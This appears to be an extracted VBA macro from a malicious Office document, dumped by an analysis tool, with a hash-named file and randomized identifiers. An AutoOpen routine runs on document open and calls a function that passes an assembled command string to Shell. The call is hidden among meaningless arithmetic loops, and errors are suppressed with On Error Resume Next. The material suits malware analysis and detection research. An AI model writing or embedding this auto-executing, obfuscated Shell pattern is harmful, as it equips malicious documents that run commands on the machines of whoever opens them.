Filename     : ./macros/e19310e4e458cc4e33b57cdc35288a590b0d7e71fd5911beb211dc7df6d3cf40
OLE stream   : Macros/VBA/PEAfrWnkoosjC
VBA filename : PEAfrWnkoosjC.cls
----------------------------------------
Attribute VB_Name = "PEAfrWnkoosjC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JMBtqbYwqY()
On Error Resume Next
For hHKhS = ztaJli To 69441
         thjbB = (KwltI - ChrW(775 * 90425) * rjmTQl * CInt(kvawi + Sqr(65227)) + 83439 - 73176 / 26744 - CDate(ubwKw - 25995 + 55354 - Hex(UqjVR / 46965)) + (DGBqX * Tan(RwzIl)))
Next
For dSpSM = dOZwj To 91270
         JuwvU = (iCffb - ChrW(79766 * 91322) * zcdzBK * CInt(zGfXX + Sqr(95723)) + 77469 - 19564 / 86782 - CDate(ZGUOX - 41529 + 4551 - Hex(tHDznN / 56699)) + (hjlww * Tan(lOKnQY)))
Next
JMBtqbYwqY = SQmVKTUL + Shell(dIQUE + Chr(XvbitDLYlt + vbKeyC + QpMLSG) + qLmXZIs + FPYpacA + ikikfCwLTw + FQIaUv + OwXnK + wAaVUdm + FZTzj, fwuZVWo + 0 + dtKAvjpC)
For RpsmZC = bbZHaX To 15442
         DBTRt = (QIYzH - ChrW(89738 * 41021) * EkEdi * CInt(RLLNLu + Sqr(79579)) + 11574 - 13048 / 57934 - CDate(bWiKI - 38802 + 98000 - Hex(qAhTpS / 15136)) + (VXpCw * Tan(fksqFG)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For RKBubj = muvPF To 98339
         bksVvD = (TiRbYi - ChrW(83471 * 96153) * SOsfZ * CInt(jYOlja + Sqr(52034)) + 53882 - 48734 / 93118 - CDate(EDAzUJ - 6535 + 35716 - Hex(bjSDzj / 78396)) + (cBNTPk * Tan(THKTF)))
Next
JMBtqbYwqY
For Gsfain = SzEoMb To 29569
         FLoDmw = (XidpSw - ChrW(62040 * 26283) * kMFUrn * CInt(TsrJiw + Sqr(47453)) + 13286 - 76375 / 41417 - CDate(OwVQT - 88028 + 14003 - Hex(wwpVB / 73442)) + (EEAWuF * Tan(iUKvo)))
Next
End Sub

